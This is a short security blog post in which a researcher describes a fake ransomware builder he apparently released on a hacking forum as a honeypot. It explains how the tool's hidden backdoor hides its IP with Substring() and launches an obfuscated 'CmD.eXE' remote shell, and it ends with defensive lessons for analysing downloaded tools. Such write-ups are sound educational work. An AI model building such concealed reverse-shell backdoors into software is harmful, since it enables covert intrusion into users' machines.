How I hacked 100 hackers

Cristian Cornea
4 min readNov 12, 2024

--

… Or script kiddies I could say

Jinn Ransomware Builder Honeypot

“Boredom always precedes a period of great creativity” — Robert M. Pirsig

How it started

Photo by Kenny Eliason on Unsplash

How it ended

Top #3 in Software Category on BreachForums
Over 100 C2 connections

Jinn Ransomware Builder on Social Media

What was “Jinn Ransomware” supposed to be?

A builder that was able to construct a fully customizable ransomware with the following features:

  1. C2 Callbacks
  2. Multi-language support (PowerShell/C#/Python)
  3. AES encryption & decryption
  4. No detection

What it is in reality

Jinn Ransomware Builder is actually a honeypot, but some of the features presented above are real.

Let’s add the missing words to the list:

1. C2 Callbacks — backdoored & hardcoded:

Line 139 — TCP Connection

The TcpClient() function takes two arguments — the host and port destination

As you can observe, the host argument is constructed using Substring() function, which extracts the IP address from the long string.

Process _Tiger = new Process();

Is being used to initiate a new process into the memory.

_Tiger.StartInfo.Filename = GetFileName();

Note down this function, we will explain it below.

Line 173 — Executable name

The GetFileName() function is used to build the stager name using the same Substring() function as in TcpClient() function.

Result: CmD.eXE

Conclusion: Our code is used to initiate a remote connection and open a process with the “CmD.eXE” executable that is being hosted on that server.

2. Multi-language support (PowerShell/C#/Python) — theoretical yes:

…But in practice, it is actually just a prompt

The user was supposed to create the configuration of the ransomware implant from the command line, by completing the C2 details, language of the implant (PowerShell, C#, Python), Persistence mode (None, Scheduled Task, New Account Creation), Password for Decryption and the list of file extensions to be encrypted.

In the end, the builder was supposed to generate two executables— one used for encryption and one for decryption.

It was used to add more spice to the features list, don’t be mad please!

3. AES encryption & decryption — but the functions are not fully function:

Those were added to the builder in order to:

  • Make it look like a legit ransomware builder
  • Hide the hardcoded backdoor in plain sight

In reality, a basic analysis of the source code, starting from the main function of the program would reveal to us that:

Main Function

The first method called is me(), which is the backdoor connection.

Definition is attached again below.

me() method

4. No detection — nothing to add here😏:

0/75 detection on VirusTotal

Lessons Learned

Always analyze the code within the samples of exploits & hacking tools taken from the Internet

  • Check for IP addresses and ports
  • Check for functions that open new connections
  • Check for functions that attempt to run system commands
  • If it has zero detections on VirusTotal, it doesn’t actually mean it’s benign

Verify the quality of the Threat Intelligence that you are spreading on Social Media or to your clients

Legal disclaimer

The activities were done in a simulated environment. No illegal hacking attempts were performed and I strictly discourage any such actions.

--

--

Cristian Cornea
Cristian Cornea

Written by Cristian Cornea

🥷🏻Zerotak - Cyber Security & Pentesting 🧑‍🎓CSTCE - Cyber Security Training Centre of Excellence 🦉SectionX.io - Threat Intel🧛🏼BSides Transylvania

Responses (10)